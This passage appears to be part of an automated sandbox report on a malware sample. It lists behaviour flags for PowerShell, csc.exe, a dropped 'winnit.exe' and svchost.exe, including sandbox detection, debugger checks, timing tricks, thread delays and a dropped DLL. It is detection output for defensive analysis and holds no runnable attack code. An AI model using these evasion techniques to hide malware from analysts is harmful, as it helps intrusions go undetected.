Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\winnit.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Roaming\winnit.exe

API/Special instruction interceptor: Address: F72B5C

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: winnit.exe, 00000006.00000003.2175727161.0000000001026000.00000004.00000020.00020000.00000000.sdmp, winnit.exe, 00000006.00000002.2186743274.0000000001026000.00000004.00000020.00020000.00000000.sdmp, winnit.exe, 00000006.00000003.2175628486.0000000000FBA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCMON.EXEZ^

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_03BAD1C0 rdtsc

7_2_03BAD1C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7315			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2268			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5zyziwbf\5zyziwbf.dll

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\winnit.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228	Thread sleep count: 7315 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7140	Thread sleep count: 2268 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6196	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 4268	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1445A GetFileAttributesW,FindFirstFileW,FindClose,	6_2_00B1445A
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1C6D1 FindFirstFileW,FindClose,	6_2_00B1C6D1
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_00B1C75C
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00B1EF95
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_00B1F0F2
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_00B1F3F3
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B137EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00B137EF
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B13B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00B13B12
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00B1BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_00B1BCBC

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AB49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

6_2_00AB49A0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: powershell.exe, 00000003.00000002.2184138928.00000000078C1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2180350037.0000000003668000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MSFTMSFT_NetEventVmNetworkAdatper.format.ps1xml
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000002.2187516853.000000000893E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000003.00000002.2180350037.0000000003668000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: FsulatedPMSFT_NetEventVmNetworkAdatper.cdxml
Source: powershell.exe, 00000003.00000002.2180711036.0000000005218000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\svchost.exe

Process queried: DebugPort

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_03BAD1C0 rdtsc

7_2_03BAD1C0

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_00417EA3 LdrLoadDll,

7_2_00417EA3

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00B23F09 BlockInput,

6_2_00B23F09

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AB3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

6_2_00AB3B3A

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AE5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

6_2_00AE5A7C

Source: C:\Users\user\AppData\Roaming\winnit.exe

Code function: 6_2_00AB4B37 LoadLibraryA,GetProcAddress,

6_2_00AB4B37

Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00F71798 mov eax, dword ptr fs:[00000030h]	6_2_00F71798
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00F72DC8 mov eax, dword ptr fs:[00000030h]	6_2_00F72DC8
Source: C:\Users\user\AppData\Roaming\winnit.exe	Code function: 6_2_00F72E28 mov eax, dword ptr fs:[00000030h]	6_2_00F72E28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B533A5 mov eax, dword ptr fs:[00000030h]	7_2_03B533A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B633A0 mov eax, dword ptr fs:[00000030h]	7_2_03B633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B633A0 mov eax, dword ptr fs:[00000030h]	7_2_03B633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B8739A mov eax, dword ptr fs:[00000030h]	7_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B8739A mov eax, dword ptr fs:[00000030h]	7_2_03B8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B28397 mov eax, dword ptr fs:[00000030h]	7_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B28397 mov eax, dword ptr fs:[00000030h]	7_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B28397 mov eax, dword ptr fs:[00000030h]	7_2_03B28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2E388 mov eax, dword ptr fs:[00000030h]	7_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2E388 mov eax, dword ptr fs:[00000030h]	7_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2E388 mov eax, dword ptr fs:[00000030h]	7_2_03B2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5438F mov eax, dword ptr fs:[00000030h]	7_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5438F mov eax, dword ptr fs:[00000030h]	7_2_03B5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C053FC mov eax, dword ptr fs:[00000030h]	7_2_03C053FC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B4E3F0 mov eax, dword ptr fs:[00000030h]	7_2_03B4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B663FF mov eax, dword ptr fs:[00000030h]	7_2_03B663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEF3E6 mov eax, dword ptr fs:[00000030h]	7_2_03BEF3E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C0539D mov eax, dword ptr fs:[00000030h]	7_2_03C0539D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h]	7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h]	7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h]	7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h]	7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h]	7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h]	7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h]	7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B403E9 mov eax, dword ptr fs:[00000030h]	7_2_03B403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEB3D0 mov ecx, dword ptr fs:[00000030h]	7_2_03BEB3D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEC3CD mov eax, dword ptr fs:[00000030h]	7_2_03BEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B3A3C0 mov eax, dword ptr fs:[00000030h]	7_2_03B3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h]	7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h]	7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h]	7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B383C0 mov eax, dword ptr fs:[00000030h]	7_2_03B383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C05341 mov eax, dword ptr fs:[00000030h]	7_2_03C05341
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B27330 mov eax, dword ptr fs:[00000030h]	7_2_03B27330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF132D mov eax, dword ptr fs:[00000030h]	7_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF132D mov eax, dword ptr fs:[00000030h]	7_2_03BF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B5F32A mov eax, dword ptr fs:[00000030h]	7_2_03B5F32A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2C310 mov ecx, dword ptr fs:[00000030h]	7_2_03B2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B50310 mov ecx, dword ptr fs:[00000030h]	7_2_03B50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB930B mov eax, dword ptr fs:[00000030h]	7_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB930B mov eax, dword ptr fs:[00000030h]	7_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB930B mov eax, dword ptr fs:[00000030h]	7_2_03BB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6A30B mov eax, dword ptr fs:[00000030h]	7_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6A30B mov eax, dword ptr fs:[00000030h]	7_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6A30B mov eax, dword ptr fs:[00000030h]	7_2_03B6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BD437C mov eax, dword ptr fs:[00000030h]	7_2_03BD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B37370 mov eax, dword ptr fs:[00000030h]	7_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B37370 mov eax, dword ptr fs:[00000030h]	7_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B37370 mov eax, dword ptr fs:[00000030h]	7_2_03B37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BEF367 mov eax, dword ptr fs:[00000030h]	7_2_03BEF367
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B29353 mov eax, dword ptr fs:[00000030h]	7_2_03B29353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B29353 mov eax, dword ptr fs:[00000030h]	7_2_03B29353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h]	7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h]	7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h]	7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB035C mov ecx, dword ptr fs:[00000030h]	7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h]	7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB035C mov eax, dword ptr fs:[00000030h]	7_2_03BB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BFA352 mov eax, dword ptr fs:[00000030h]	7_2_03BFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB2349 mov eax, dword ptr fs:[00000030h]	7_2_03BB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2D34C mov eax, dword ptr fs:[00000030h]	7_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B2D34C mov eax, dword ptr fs:[00000030h]	7_2_03B2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB92BC mov eax, dword ptr fs:[00000030h]	7_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB92BC mov eax, dword ptr fs:[00000030h]	7_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB92BC mov ecx, dword ptr fs:[00000030h]	7_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BB92BC mov ecx, dword ptr fs:[00000030h]	7_2_03BB92BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B402A0 mov eax, dword ptr fs:[00000030h]	7_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B402A0 mov eax, dword ptr fs:[00000030h]	7_2_03B402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B452A0 mov eax, dword ptr fs:[00000030h]	7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B452A0 mov eax, dword ptr fs:[00000030h]	7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B452A0 mov eax, dword ptr fs:[00000030h]	7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B452A0 mov eax, dword ptr fs:[00000030h]	7_2_03B452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	7_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	7_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	7_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BF92A6 mov eax, dword ptr fs:[00000030h]	7_2_03BF92A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]	7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	7_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC72A0 mov eax, dword ptr fs:[00000030h]	7_2_03BC72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03BC72A0 mov eax, dword ptr fs:[00000030h]	7_2_03BC72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03C052E2 mov eax, dword ptr fs:[00000030h]	7_2_03C052E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6329E mov eax, dword ptr fs:[00000030h]	7_2_03B6329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03B6329E mov eax, dword ptr fs:[00000030h]	7_2_03B6329E
